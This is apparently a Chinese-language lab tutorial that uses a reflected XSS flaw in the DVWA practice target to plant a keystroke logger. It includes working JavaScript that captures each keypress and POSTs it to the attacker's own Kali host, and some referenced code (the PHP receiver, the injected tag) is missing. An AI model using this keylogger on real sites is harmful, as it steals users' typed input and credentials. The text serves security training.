利用XSS漏洞实现键盘记录器

利用XSS漏洞实现键盘记录器

本实验以反射性的XSS漏洞为例
实验环境：dvwa靶机(ip:192.168.135.140)
kali linux(ip:192.168.135.138)

1.首先开启在kail上开启apache服务

/etc/init.d/apache2 start

在firefox地址栏输入： http://192.168.135.138 或者 http://localhost 检测apache是否开启,看见以下即可

2.在/var/www/html创建三个文件
(1)keylogger.js【远程js脚本文件】

document.onkeypress = function(evt) {
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) {
        var http = new XMLHttpRequest();
        var param = encodeURI(key)
        http.open("POST","http://192.168.135.138/keylogger.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}                  

(2)keylogger.php 【用于将键盘上的敲击的记录通过POST传送到keylog.txt中】

(3)keylog.txt 【空文件用于接收键盘的记录】

2.XSS漏洞测试开始
（1）在浏览器访问dvwa靶机并且登录

（2）在输入框中输入以下代码

或者使用hackbar插件

（3）紧接着在这个页面随意敲击键盘并查看keylog.txt是否有记录

看见以上效果及实验成功。